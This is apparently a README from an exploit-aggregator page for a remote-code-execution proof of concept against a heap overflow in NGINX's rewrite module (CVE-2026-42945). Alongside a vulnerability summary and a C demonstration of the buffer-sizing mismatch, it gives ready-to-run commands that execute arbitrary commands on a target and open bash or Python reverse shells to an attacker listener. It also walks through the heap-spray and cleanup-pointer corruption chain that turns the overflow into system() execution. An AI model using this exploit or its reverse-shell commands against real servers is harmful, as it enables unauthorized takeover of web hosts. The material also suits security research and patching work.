## https://sploitus.com/exploit?id=A6ABFB6C-1C6C-5010-B6BD-1110C1242606
# CVE-2026-42945 (NGINX Rift) RCE PoC with Reverse Shell
Remote code execution proof-of-concept for **CVE-2026-42945**, a heap buffer overflow in NGINX's `ngx_http_rewrite_module`. This fork extends the public trigger PoC with an embedded reverse-shell listener and configurable exploitation parameters for CTF and isolated lab environments.
---
## Vulnerability Summary
- **CVE ID:** CVE-2026-42945
- **Alias:** NGINX Rift
- **Affected Component:** `ngx_http_rewrite_module`
- **Affected Versions:** NGINX Open Source `0.6.27` through `1.30.0`; NGINX Plus `R32` through `R36`
- **Fixed Versions:** NGINX Open Source `1.30.1` / `1.31.0`; NGINX Plus `R36 P4`, `R35 P2`, `R32 P6`
- **Root Cause:** Two-pass script engine mismatch. The length-calculation pass runs on a fresh sub-engine with `is_args = 0`, while the copy pass runs on the main engine with `is_args = 1`, invoking `ngx_escape_uri(..., NGX_ESCAPE_ARGS)`. Escapable bytes expand to 3 bytes each, overflowing an undersized heap buffer with attacker-controlled URI data.
- **Prerequisites for RCE:** Vulnerable `rewrite`/`set` configuration using unnamed PCRE captures (`$1`, `$2`) plus `?` in the replacement string; disabled ASLR or known heap/libc base addresses; ability to spray the heap via POST bodies.
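The two-pass mismatch described under **Root Cause**, as an added example that is neither nginx source nor the PoC's code: a toy escaper that sizes its buffer with one flag and copies with another, beside the consistent form. The escape table, the `ESCAPE_ARGS` flag, the function names and the `/api/a b c` input are constructed for illustration only; what carries over from the advisory is that each escapable byte costs 3 output bytes in the copy pass but was counted as 1 in the length pass, so the overrun grows by 2 bytes per escapable byte in attacker-controlled input.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the bug class (added example, not nginx code).
 * The escape table below is illustrative, not nginx's ngx_escape_uri table. */

#define ESCAPE_ARGS 1   /* hypothetical flag standing in for NGX_ESCAPE_ARGS */

/* Bytes the toy args escaper percent-encodes (illustrative set). */
static int needs_escape(unsigned char c, int flags)
{
    if (!(flags & ESCAPE_ARGS))
        return 0;
    return c <= 0x20 || c >= 0x7f || strchr("\"#%&+<>", c) != NULL;
}

/* Pass 1: number of output bytes the escaper produces under `flags`. */
size_t escape_len(const unsigned char *src, size_t n, int flags)
{
    size_t len = 0;
    for (size_t i = 0; i < n; i++)
        len += needs_escape(src[i], flags) ? 3 : 1;
    return len;
}

/* Pass 2: escape src into dst, returning bytes written. dst must hold
 * escape_len(src, n, flags) bytes computed with the SAME flags. */
size_t escape_copy(unsigned char *dst, const unsigned char *src, size_t n, int flags)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        if (needs_escape(src[i], flags)) {
            dst[o++] = '%';
            dst[o++] = (unsigned char)hex[src[i] >> 4];
            dst[o++] = (unsigned char)hex[src[i] & 0x0f];
        } else {
            dst[o++] = src[i];
        }
    }
    return o;
}

#define SLACK 64  /* guard region so the demo measures the overrun instead of crashing */

/* Vulnerable flow: size the buffer with flags_len, copy with flags_copy.
 * Returns how many bytes the copy pass wrote past the sized buffer (0 when the
 * passes agree). The allocation is padded by SLACK bytes filled with 0xAA so
 * the overrun can be counted; on a real heap those bytes land in the
 * neighbouring chunk instead. */
size_t overrun_bytes(const char *uri, int flags_len, int flags_copy)
{
    size_t n = strlen(uri);
    size_t sized  = escape_len((const unsigned char *)uri, n, flags_len);
    size_t needed = escape_len((const unsigned char *)uri, n, flags_copy);
    if (needed > sized + SLACK)          /* keep the demo itself in bounds */
        return (size_t)-1;
    unsigned char *buf = malloc(sized + SLACK);
    if (!buf)
        return (size_t)-1;
    memset(buf + sized, 0xAA, SLACK);
    escape_copy(buf, (const unsigned char *)uri, n, flags_copy);
    size_t clobbered = 0;                /* escaper output is ASCII, never 0xAA */
    for (size_t i = 0; i < SLACK && buf[sized + i] != 0xAA; i++)
        clobbered++;
    free(buf);
    return clobbered;
}

/* Hardened flow: measure and copy with the same flags, so the buffer is
 * exactly right. Returns a NUL-terminated heap string (caller frees). */
char *escape_uri_safe(const char *uri, int flags)
{
    size_t n = strlen(uri);
    size_t len = escape_len((const unsigned char *)uri, n, flags);
    char *out = malloc(len + 1);
    if (!out)
        return NULL;
    size_t w = escape_copy((unsigned char *)out, (const unsigned char *)uri, n, flags);
    assert(w == len);                    /* both passes agree by construction */
    out[len] = '\0';
    return out;
}

int main(void)
{
    /* Constructed URI: two space bytes, each expanding to three bytes when args-escaped. */
    const char *uri = "/api/a b c";
    printf("mismatched passes overrun: %zu bytes\n", overrun_bytes(uri, 0, ESCAPE_ARGS));
    printf("consistent passes overrun: %zu bytes\n", overrun_bytes(uri, ESCAPE_ARGS, ESCAPE_ARGS));
    char *s = escape_uri_safe(uri, ESCAPE_ARGS);
    printf("safe escape: %s\n", s);
    free(s);
    return 0;
}
```

Build with `cc -std=c99 -Wall` and run. `overrun_bytes` deliberately over-allocates a guard region so the demonstration measures the overrun rather than corrupting a real neighbour; the spray-and-corrupt-`cleanup` chain described later in this README depends on exactly those extra bytes landing in an adjacent pool allocation.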
---
## Files
| File | Description |
|------|-------------|
| `cve_2026_42945_rce_poc.py` | Python exploit with built-in reverse-shell listener and command execution modes. |
---
## Requirements
- Python 3.8+
- Target NGINX instance matching the vulnerable version and configuration profile.
- Network reachability to the target HTTP port.
- For reverse shell: attacker host must be reachable from the target on the chosen listener port.
---
## Usage
### Execute a single command
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--cmd "id > /tmp/pwned"
```
### Spawn a reverse shell (default bash)
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--shell \
--listen-ip 10.0.0.1 \
--listen-port 1337
```
### Python reverse shell payload
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--shell \
--shell-type python \
--listen-ip 10.0.0.1 \
--listen-port 1337
```
### Calibrate addresses for a specific target
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--shell \
--listen-ip 10.0.0.1 \
--listen-port 1337 \
--heap-base 0x555555659000 \
--libc-base 0x7ffff77ba000 \
--system-offset 0x50d70
```
---
## How It Works
1. **Heap Spray:** Send multiple POST requests with bodies containing a fake `ngx_pool_cleanup_s` structure: `system@libc | pointer to command | null`. These bodies occupy stable heap locations.
2. **Trigger Overflow:** Send a crafted GET request to a vulnerable `rewrite` endpoint. The URI pattern is:
```
/api/
```
The overflow corrupts the `cleanup` pointer of an adjacent `ngx_pool_t`.
3. **Code Execution:** When the pool is destroyed, the corrupted `cleanup` pointer invokes `system(command)`, executing the attacker-controlled command inside the NGINX worker process.
4. **Reverse Shell:** If `--shell` is used, the command is a reverse-shell payload and the embedded listener catches the incoming connection.
---
## Security notice
This tool is intended for:
- CTF and lab exercises.
- Authorized penetration testing with written permission.
- Security research and defense-hardening activities.
Do not use on systems you do not own or have explicit permission to test.
---
## License
Use at your own risk. The author is not responsible for unauthorized or illegal use.
---
## Attribution
Original vulnerability research and PoC by **depthfirstdisclosures** (https://github.com/depthfirstdisclosures/nginx-rift).
This Python reverse-shell fork was created for red-team lab / CTF use.
---
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-42945
- NGINX Security Advisories: https://nginx.org/en/security_advisories.html
- F5 / NGINX Knowledge Base: https://my.f5.com/manage/s/article/K000161019
- Original research repository: https://github.com/depthfirstdisclosures/nginx-rift